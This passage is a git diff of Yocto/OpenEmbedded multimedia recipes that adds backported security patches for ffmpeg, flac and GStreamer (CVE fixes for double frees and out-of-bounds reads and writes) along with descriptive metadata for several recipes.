+ libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
+ 1 file changed, 35 insertions(+), 11 deletions(-)
+
+diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
+index 36ac0ac..bbc5ba6 100644
+--- a/libavcodec/pthread_frame.c
++++ b/libavcodec/pthread_frame.c
+@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
+                                     * Set for the first N packets, where N is the number of threads.
+                                     * While it is set, ff_thread_en/decode_frame won't return any results.
+                                     */
++
++    /* hwaccel state is temporarily stored here in order to transfer its ownership
++     * to the next decoding thread without the need for extra synchronization */
++    const AVHWAccel *stash_hwaccel;
++    void            *stash_hwaccel_context;
++    void            *stash_hwaccel_priv;
+ } FrameThreadContext;
+ 
+ #define THREAD_SAFE_CALLBACKS(avctx) \
+@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
+             ff_thread_finish_setup(avctx);
+ 
+         if (p->hwaccel_serializing) {
++            /* wipe hwaccel state to avoid stale pointers lying around;
++             * the state was transferred to FrameThreadContext in
++             * ff_thread_finish_setup(), so nothing is leaked */
++            avctx->hwaccel                     = NULL;
++            avctx->hwaccel_context             = NULL;
++            avctx->internal->hwaccel_priv_data = NULL;
++
+             p->hwaccel_serializing = 0;
+             pthread_mutex_unlock(&p->parent->hwaccel_mutex);
+         }
++        av_assert0(!avctx->hwaccel);
+ 
+         if (p->async_serializing) {
+             p->async_serializing = 0;
+@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
+         dst->color_range = src->color_range;
+         dst->chroma_sample_location = src->chroma_sample_location;
+ 
+-        dst->hwaccel = src->hwaccel;
+-        dst->hwaccel_context = src->hwaccel_context;
+-
+         dst->channels       = src->channels;
+         dst->sample_rate    = src->sample_rate;
+         dst->sample_fmt     = src->sample_fmt;
+         dst->channel_layout = src->channel_layout;
+-        dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
+ 
+         if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
+             (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
+@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
+             pthread_mutex_unlock(&p->mutex);
+             return err;
+         }
++
++        /* transfer hwaccel state stashed from previous thread, if any */
++        av_assert0(!p->avctx->hwaccel);
++        FFSWAP(const AVHWAccel*, p->avctx->hwaccel,                     fctx->stash_hwaccel);
++        FFSWAP(void*,            p->avctx->hwaccel_context,             fctx->stash_hwaccel_context);
++        FFSWAP(void*,            p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
+     }
+ 
+     av_packet_unref(&p->avpkt);
+@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
+         async_lock(p->parent);
+     }
+ 
++    /* save hwaccel state for passing to the next thread;
++     * this is done here so that this worker thread can wipe its own hwaccel
++     * state after decoding, without requiring synchronization */
++    av_assert0(!p->parent->stash_hwaccel);
++    p->parent->stash_hwaccel         = avctx->hwaccel;
++    p->parent->stash_hwaccel_context = avctx->hwaccel_context;
++    p->parent->stash_hwaccel_priv    = avctx->internal->hwaccel_priv_data;
++
+     pthread_mutex_lock(&p->progress_mutex);
+     if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
+         av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
+@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+ 
+     park_frame_worker_threads(fctx, thread_count);
+ 
+-    if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
+-        if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
+-            av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
+-            fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
+-            fctx->threads->avctx->internal->is_copy = 1;
+-        }
+-
+     for (i = 0; i < thread_count; i++) {
+         PerThreadContext *p = &fctx->threads[i];
+ 
+@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+     pthread_mutex_destroy(&fctx->async_mutex);
+     pthread_cond_destroy(&fctx->async_cond);
+ 
++    /* if we have stashed hwaccel state, move it to the user-facing context,
++     * so it will be freed in avcodec_close() */
++    av_assert0(!avctx->hwaccel);
++    FFSWAP(const AVHWAccel*, avctx->hwaccel,                     fctx->stash_hwaccel);
++    FFSWAP(void*,            avctx->hwaccel_context,             fctx->stash_hwaccel_context);
++    FFSWAP(void*,            avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
++
+     av_freep(&avctx->internal->thread_ctx);
+ 
+     if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
index fddfef9e27..f12052548f 100644
--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -26,7 +26,14 @@ LIC_FILES_CHKSUM = "file://COPYING.GPLv2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
 SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
            file://mips64_cpu_detection.patch \
            file://CVE-2020-12284.patch \
-           "
+           file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
+           file://CVE-2021-3566.patch \
+           file://CVE-2021-38291.patch \
+           file://CVE-2022-1475.patch \
+           file://CVE-2022-3109.patch \
+           file://CVE-2022-3341.patch \
+           file://CVE-2022-48434.patch \
+          "
 SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
 SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
 
@@ -129,6 +136,11 @@ do_configure() {
     ${S}/configure ${EXTRA_OECONF}
 }
 
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+        sed -i -e "s,${WORKDIR},,g" ${B}/config.h
+}
+
 PACKAGES =+ "libavcodec \
              libavdevice \
              libavfilter \
diff --git a/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
new file mode 100644
index 0000000000..e042872dc0
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
+From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
+From: Martijn van Beurden <mvanb1@gmail.com>
+Date: Wed, 3 Aug 2022 13:52:19 +0200
+Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
+
+Parts of the code use realloc like
+
+x = safe_realloc(x, somesize);
+
+when this is the case, the safe_realloc variant used must free the
+old memory block in case it fails, otherwise it will leak. However,
+there are also instances in the code where handling is different:
+
+if (0 == (x = safe_realloc(y, somesize)))
+    return false
+
+in this case, y should not be freed, as y is not set to NULL we
+could encounter double frees. Here the safe_realloc_nofree
+functions are used.
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
+CVE: CVE-2020-22219
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ include/share/alloc.h         | 41 +++++++++++++++++++++++++++++++----
+ src/flac/encode.c             |  4 ++--
+ src/flac/foreign_metadata.c   |  2 +-
+ src/libFLAC/bitwriter.c       |  2 +-
+ src/libFLAC/metadata_object.c |  2 +-
+ src/plugin_common/tags.c      |  2 +-
+ src/share/utf8/iconvert.c     |  2 +-
+ 7 files changed, 44 insertions(+), 11 deletions(-)
+
+diff --git a/include/share/alloc.h b/include/share/alloc.h
+index 914de9b..55bdd1d 100644
+--- a/include/share/alloc.h
++++ b/include/share/alloc.h
+@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
+		free(oldptr);
+	return newptr;
+ }
+-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
++static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
++{
++	size2 += size1;
++	if(size2 < size1)
++		return 0;
++	return realloc(ptr, size2);
++}
++
++static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+	size2 += size1;
+	if(size2 < size1) {
+		free(ptr);
+		return 0;
+	}
+-	return realloc(ptr, size2);
++	size3 += size2;
++	if(size3 < size2) {
++		free(ptr);
++		return 0;
++	}
++	return safe_realloc_(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
++static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+	size2 += size1;
+	if(size2 < size1)
+@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
+	return realloc(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
++static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
+ {
+	size2 += size1;
+	if(size2 < size1)
+@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
+	return safe_realloc_(ptr, size1*size2);
+ }
+
++static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
++{
++	if(!size1 || !size2)
++		return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++	if(size1 > SIZE_MAX / size2)
++		return 0;
++	return realloc(ptr, size1*size2);
++}
++
+ /* size1 * (size2 + size3) */
+ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
+	return safe_realloc_mul_2op_(ptr, size1, size2);
+ }
+
++/* size1 * (size2 + size3) */
++static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
++{
++	if(!size1 || (!size2 && !size3))
++		return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++	size2 += size3;
++	if(size2 < size3)
++		return 0;
++	return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
++}
++
+ #endif
+diff --git a/src/flac/encode.c b/src/flac/encode.c
+index a9b907f..f87250c 100644
+--- a/src/flac/encode.c
++++ b/src/flac/encode.c
+@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
+ static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
+ {
+	void *x;
+-	if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++	if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+		return false;
+	m->metadata = (FLAC__StreamMetadata**)x;
+-	if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++	if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+		return false;
+	m->needs_delete = (FLAC__bool*)x;
+	m->metadata[m->num_metadata] = d;
+diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
+index 9ad9c18..fdfb3cf 100644
+--- a/src/flac/foreign_metadata.c
++++ b/src/flac/foreign_metadata.c
+@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
+
+ static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
+ {
+-	foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
++	foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
+	if(fb) {
+		fb[fm->num_blocks].offset = offset;
+		fb[fm->num_blocks].size = size;
+diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
+index 6e86585..a510b0d 100644
+--- a/src/libFLAC/bitwriter.c
++++ b/src/libFLAC/bitwriter.c
+@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
+	FLAC__ASSERT(new_capacity > bw->capacity);
+	FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
+
+-	new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
++	new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
+	if(new_buffer == 0)
+		return false;
+	bw->buffer = new_buffer;
+diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
+index de8e513..aef65be 100644
+--- a/src/libFLAC/metadata_object.c
++++ b/src/libFLAC/metadata_object.c
+@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
+ /* realloc() failure leaves entry unchanged */
+ static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
+ {
+-	FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
++	FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
+	if (x != NULL) {
+		x[length] = '\0';
+		*entry = x;
+diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
+index ae440c5..dfa10d3 100644
+--- a/src/plugin_common/tags.c
++++ b/src/plugin_common/tags.c
+@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
+		const size_t value_len = strlen(value);
+		const size_t separator_len = strlen(separator);
+		FLAC__byte *new_entry;
+-		if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
++		if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
+			return false;
+		memcpy(new_entry+entry->length, separator, separator_len);
+		entry->length += separator_len;
+diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
+index 8ab53c1..876c06e 100644
+--- a/src/share/utf8/iconvert.c
++++ b/src/share/utf8/iconvert.c
+@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
+       iconv_close(cd1);
+       return ret;
+     }
+-    newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
++    newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
+     if (!newbuf)
+       goto fail;
+     ob = (ob - utfbuf) + newbuf;
+--
+2.40.0
diff --git a/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
new file mode 100644
index 0000000000..e19833a5ad
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
+From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
+From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
+Date: Fri, 18 Dec 2020 22:28:36 +0530
+Subject: [PATCH] libFlac: Exit at EOS in verify mode
+
+When verify mode is enabled, once decoder flags end of stream,
+encode processing is considered complete.
+
+CVE-2021-0561
+
+Signed-off-by: Ralph Giles <giles@thaumas.net>
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
+CVE: CVE-2021-0561
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/libFLAC/stream_encoder.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
+index 4c91247fe8..7109802c27 100644
+--- a/src/libFLAC/stream_encoder.c
++++ b/src/libFLAC/stream_encoder.c
+@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
+ 			encoder->private_->verify.needs_magic_hack = true;
+ 		}
+ 		else {
+-			if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
++			if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
++			    || (!is_last_block
++				    && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
+ 				FLAC__bitwriter_release_buffer(encoder->private_->frame);
+ 				FLAC__bitwriter_clear(encoder->private_->frame);
+ 				if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)
diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
 DEPENDS = "libogg"
 
 SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
+           file://CVE-2020-22219.patch \
+           file://CVE-2021-0561.patch \
 "
 
 SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"
diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
 SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
+DESCRIPTION = "GStreamer example applications"
+HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
 LICENSE = "LGPL-2.0+"
 LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
 
 DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
 
-SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
            file://0001-Make-player-examples-installable.patch \
            file://gst-player.desktop \
            "
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Libav-based GStreamer 1.x plugin"
+DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
+muxers, and demuxers provided by FFmpeg."
 HOMEPAGE = "http://gstreamer.freedesktop.org/"
 SECTION = "multimedia"
 
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
 SUMMARY = "OpenMAX IL plugins for GStreamer"
+DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
 HOMEPAGE = "http://gstreamer.freedesktop.org/"
 SECTION = "multimedia"
 
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
+
 SRC_URI = " \
     https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
     file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
+From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
+Date: Wed, 3 Mar 2021 01:08:25 +0000
+Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
+
+Check the right variable when checking if there's
+enough data left to read the frame size.
+
+Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
+
+Upstream-Status: Backport
+[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
+CVE: 	CVE-2021-3522
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ gst-libs/gst/tag/id3v2frames.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
+index 8e9f782..f39659b 100644
+--- a/gst-libs/gst/tag/id3v2frames.c
++++ b/gst-libs/gst/tag/id3v2frames.c
+@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
+ 
+   if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
+           ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
+-    if (work->hdr.frame_data_size <= 4)
++    if (frame_data_size <= 4)
+       return FALSE;
+     if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
+       work->parse_size = GST_READ_UINT32_BE (frame_data);
+-- 
+2.17.1
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index a4f4772c1c..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
 LICENSE = "GPLv2+ & LGPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
                     file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
             file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
             file://0005-viv-fb-Make-sure-config.h-is-included.patch \
             file://0009-glimagesink-Downrank-to-marginal.patch \
+            file://CVE-2021-3522.patch \
             "
 SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
 SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"
@@ -97,3 +101,5 @@ def get_opengl_cmdline_list(switch_name, options, d):
         return '-D' + switch_name + '=' + ','.join(selected_options)
     else:
         return ''
+
+CVE_PRODUCT += "gst-plugins-base"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
+From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Thu, 4 Mar 2021 13:05:19 +0200
+Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
+
+The old code had a couple of issues that all lead to potential memory
+safety bugs.
+
+  - Use a constant for the Wavpack4Header size instead of using sizeof.
+    It's written out into the data and not from the struct and who knows
+    what special alignment/padding requirements some C compilers have.
+  - gst_buffer_set_size() does not realloc the buffer when setting a
+    bigger size than allocated, it only allows growing up to the maximum
+    allocated size. Instead use a GstAdapter to collect all the blocks
+    and take out everything at once in the end.
+  - Check that enough data is actually available in the input and
+    otherwise handle it an error in all cases instead of silently
+    ignoring it.
+
+Among other things this fixes out of bounds writes because the code
+assumed gst_buffer_set_size() can grow the buffer and simply wrote after
+the end of the buffer.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
+CVE: CVE-2021-3497
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
+ gst/matroska/matroska-ids.h   |  2 +
+ 2 files changed, 55 insertions(+), 46 deletions(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 467815986..0e47ee7b5 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+     guint32 block_samples, tmp;
+     gsize size = gst_buffer_get_size (*buf);
+ 
++    if (size < 4) {
++      GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++      gst_buffer_unmap (*buf, &map);
++      return GST_FLOW_ERROR;
++    }
++
+     gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
+     block_samples = GUINT32_FROM_LE (tmp);
+     /* we need to reconstruct the header of the wavpack block */
+@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+     /* -20 because ck_size is the size of the wavpack block -8
+      * and lace_size is the size of the wavpack block + 12
+      * (the three guint32 of the header that already are in the buffer) */
+-    wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
++    wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
+ 
+     /* block_samples, flags and crc are already in the buffer */
+-    newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
++    newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
+ 
+     gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
+     data = outmap.data;
+@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+     audiocontext->wvpk_block_index += block_samples;
+   } else {
+     guint8 *outdata = NULL;
+-    guint outpos = 0;
+-    gsize buf_size, size, out_size = 0;
++    gsize buf_size, size;
+     guint32 block_samples, flags, crc, blocksize;
++    GstAdapter *adapter;
++
++    adapter = gst_adapter_new ();
+ 
+     gst_buffer_map (*buf, &map, GST_MAP_READ);
+     buf_data = map.data;
+@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+     if (buf_size < 4) {
+       GST_ERROR_OBJECT (element, "Too small wavpack buffer");
+       gst_buffer_unmap (*buf, &map);
++      g_object_unref (adapter);
+       return GST_FLOW_ERROR;
+     }
+ 
+@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+       data += 4;
+       size -= 4;
+ 
+-      if (blocksize == 0 || size < blocksize)
+-        break;
+-
+-      g_assert ((newbuf == NULL) == (outdata == NULL));
++      if (blocksize == 0 || size < blocksize) {
++        GST_ERROR_OBJECT (element, "Too small wavpack buffer");
++        gst_buffer_unmap (*buf, &map);
++        g_object_unref (adapter);
++        return GST_FLOW_ERROR;
++      }
+ 
